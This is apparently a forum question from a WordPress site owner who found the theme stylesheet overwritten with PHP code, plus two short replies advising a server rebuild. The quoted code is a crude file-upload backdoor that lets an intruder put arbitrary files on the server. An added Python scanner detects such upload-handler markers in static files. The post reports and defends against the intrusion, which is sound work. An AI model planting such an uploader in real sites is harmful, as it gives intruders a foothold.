WordPress Site Possibly Hacked

July 8, 2014

Today I went to my site (julianlmedina.com) and noticed that my styles were gone. I found out that my theme’s stylesheet has been overwritten with this:

    $filedir = ""; 
    $maxfile = '2000000';

    $userfile_name = $_FILES['image']['name'];
    $userfile_tmp = $_FILES['image']['tmp_name'];
    if (isset($_FILES['image']['name'])) {
        $abod = $filedir.$userfile_name;
        @move_uploaded_file($userfile_tmp, $abod);

    echo"<center><b>Done ==> $userfile_name</b></center>";
    <form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';

I am on an Ubuntu server with SSH and FTP access. Any suggestions? Can I view a log to see if there are any weird IPs logging in?
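To scope a finding like the one above, the following added example (not part of the original post) walks a WordPress tree and reports static files, such as stylesheets, that contain the upload-handler markers visible in the quoted code, along with each file's modification time. The extension list, the two-marker threshold and the sample tree built in `demo()` are assumptions made for illustration.

```python
import os
import re
import tempfile
from datetime import datetime, timezone

# Markers taken from the code quoted in the question.
MARKERS = {
    "move_uploaded_file": re.compile(rb"move_uploaded_file\s*\("),
    "$_FILES": re.compile(rb"\$_FILES\s*\["),
    "multipart-form": re.compile(rb"multipart/form-data"),
}
# Assumption: these file types never legitimately contain PHP upload handling.
STATIC_EXT = {".css", ".js", ".txt", ".html", ".png", ".jpg", ".gif", ".ico"}

def scan_tree(root, min_hits=2):
    """Return sorted [(path, mtime_utc, markers)] for suspicious static files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in STATIC_EXT:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(2_000_000)  # cap the read per file
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            hits = [label for label, rx in MARKERS.items() if rx.search(data)]
            if len(hits) >= min_hits:  # one marker alone is too noisy
                ts = datetime.fromtimestamp(os.path.getmtime(path), timezone.utc)
                findings.append((path, ts.isoformat(timespec="seconds"), hits))
    return sorted(findings)

def demo():
    """Constructed sample tree: one clean stylesheet, one overwritten one."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    theme = os.path.join(root, "wp-content", "themes", "sample-theme")
    os.makedirs(theme)
    with open(os.path.join(theme, "clean.css"), "w") as fh:
        fh.write("body { margin: 0; }\n")
    with open(os.path.join(theme, "style.css"), "w") as fh:
        fh.write("$userfile_tmp = $_FILES['image']['tmp_name'];\n"
                 "@move_uploaded_file($userfile_tmp, $abod);\n")
    return scan_tree(root)

if __name__ == "__main__":
    for path, mtime, hits in demo():
        print(mtime, path, ",".join(hits))
```

The reported modification time gives a starting point for reading the SSH, FTP and web server logs around the same period, but it can be changed by whoever wrote the file, so treat it as a lead rather than proof.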

2 Answers

If you have been compromised, shut down the server immediately and rebuild it from scratch.

That’s what I meant by the server, yes.

